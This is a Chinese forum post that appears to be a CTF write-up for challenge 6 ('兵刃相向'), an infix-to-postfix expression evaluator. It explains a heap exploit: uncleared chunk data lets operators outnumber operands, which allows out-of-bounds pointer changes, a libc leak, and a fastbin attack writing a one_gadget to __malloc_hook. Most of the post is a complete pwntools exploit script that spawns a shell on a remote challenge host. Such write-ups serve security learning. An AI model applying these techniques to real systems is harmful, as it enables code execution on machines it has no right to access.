首页
论坛
课程
招聘
[分享]第六题 兵刃相向 wp
2020-11-29 22:08 1444

[分享]第六题 兵刃相向 wp

2020-11-29 22:08
1444

第六题 兵刃相向 wp

思路

一个中序表达式转后序表达式计算的程序,parse_infix_expression函数和process_infix_token函数检查都比较严格,因此可以把攻击点着重放在evaluate_postfix_expression函数中。程序在取堆块的时候并没有将原有的堆块的数据置零,可以申请AB两个堆块,B堆块的name设置为运算符,将AB两堆块合并,再取出稍大的堆块,让postfix与B堆块的name对接,使得运算符比操作数要多。
图片描述
运算符多了,就可以通过这段代码对g_ctx.g_symbol_ptrs进行越界访问了。向上越界对g_ctx.g_symbol_ptrs里的堆块地址做增减运算,可以完成很多事了。
图片描述
既然可以改变g_ctx.g_symbol_ptrs中的堆块地址,那pval就是可控的了。利用pval写入乘法运算符,之后利用乘法运算符越界将g_ctx.g_broken置零,泄露bin的地址,构造fastbin attack向malloc_hook写入one_gadget就可以得到shell了。
脚本写的很垃圾,有很大的优化空间。不过做出来就行了,也懒得改了。

exp如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
from pwn import *
context.log_level = "debug"
local = False
if local:
    p = process("./ee")
    libc = ELF("/lib/x86_64-linux-gnu/libc.so.6")
    one_gadget = 0xf0364
    smallbin_offset = 0x7ffff7dd1b88 - 0x7ffff7a0d000
else:
    p = remote("121.36.145.157","10000")
    libc = ELF("./x64_libc.so.6")
    one_gadget = 0xf02a4
    smallbin_offset = 104 + 0x3C4B20
def Gdb():
    gdb.attach(p,"b *0x555555554000+0x22C3\ndirectory ./srcs/\n")
    #0x1bb7
def create(name, express):
    p.sendlineafter(": ", str(1))
    p.sendafter(": ", name)
    p.sendafter(": ", express)
def show(name):
    p.sendlineafter(": ", str(4))
    p.sendafter(": ", name)
def delete(name):
    p.sendlineafter(": ", str(2))
    p.sendafter(": ", name)
def revalute(name):
    p.sendlineafter(": ", str(3))
    p.sendafter(": ", name)
def getSize(size):
    return (size + 27 + 0x10)
 
 
create("aaa\n",("00000000000000*" * 6)[:-1]) #0 used
create("-" * 2,("00000000000000*" * 6)[:-1]) #1 used
create("ccc\n",("00000000000000*" * 6)[:-1]) #2 used
 
delete("aaa\n") #0 free
delete("-" * 2) #1 free
 
create("aaa\n",("00000000001-" + "000000000000-" *7)[:-1] + "00")
#0 used
length = "qwertyuiopsdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM"
for i in range(21-3):
    create(length[i]*2, "1+1")
create("*"*18, "10000 * 347063282342678 + 7882")
revalute("aaa\n")
revalute("\n")
for i in range(26):
    revalute("aaa\n")
for i in range(21-3):
    delete(length[i]*2)
 
revalute("\n")
 
create("aaa\n",("00000000000000*" * 6)[:-1]) #0 used
create("-" * 2,("00000000000000*" * 6)[:-1]) #1 used
create("ccc\n",("00000000000000*" * 6)[:-1]) #2 used
 
delete("aaa\n") #0 free
delete("-" * 2) #1 free
create("aaa\n",("00000000001-" + "000000000000-" *7)[:-1] + "00")
 
#create("zzz\n",("00000000008-" + "000000000000-" *5)[:-1] + "00") #fastbin attack
#create("uuu\n",("00000000008-" + "000000000000-" *5)[:-1] + "00")
#create("kkk\n",("00000000008-" + "000000000000-" *5)[:-1] + "00")
offset = (0x00005555557584a5 - 0x5555557580fd)
for i in range(offset):
    revalute("aaa\n")
show("1 +00000000!\n")
p.recvuntil("[*]value : ")
 
smallbin = int(p.recvline()[:-1])
#Gdb()
log.success("smallbin ==> " + hex(smallbin))
libc.address = smallbin - smallbin_offset
offset = (0x5555557580fd - 0x5555557580b0)
for i in range(offset):
    revalute("aaa\n")
delete("\n")
for i in range(21-6):
    create(length[i]*2, "1+1")
create("zzz\n",("00000000008-" + "0000000000-" *4)[:-1] + "00") #fastbin attack
create("uuu\n",("00000000008-" + "0000000000-" *4)[:-1] + "00")
create("kkk\n",("00000000008-" + "0000000000-" *4)[:-1] + "00")
create("ttt\n",("00000000008-" + "0000000000-" *4)[:-1] + "00")
offset = (0x0000555555758730 - 0x00005555557586c0)
for i in range(offset):
    revalute("aaa\n")
 
delete("kkk\n")
delete("uuu\n")
delete("\n")
#Gdb()
delete("aaa\n")
delete("qq\n")
delete("rr\n")
delete("uu\n")
create(p64(libc.sym['__malloc_hook']-0x23),("00000000008-" + "0000000000-" *4)[:-1] + "00")
create("deadC0de1",("00000000008-" + "0000000000-" *4)[:-1] + "00")
create("deadC0de2",("00000000008-" + "0000000000-" *4)[:-1] + "00")
one_gadget = libc.address + one_gadget
one_gadget = one_gadget / 4
create("a"*0x12, "{0} * 4 {1}".format(one_gadget,"-00000000"*4))
#Gdb()
create("getshell","1-1")
p.interactive()

看雪侠者千人榜,看看你上榜了吗?

收藏
点赞0
打赏
分享
最新回复 (0)
游客
登录 | 注册 方可回帖
返回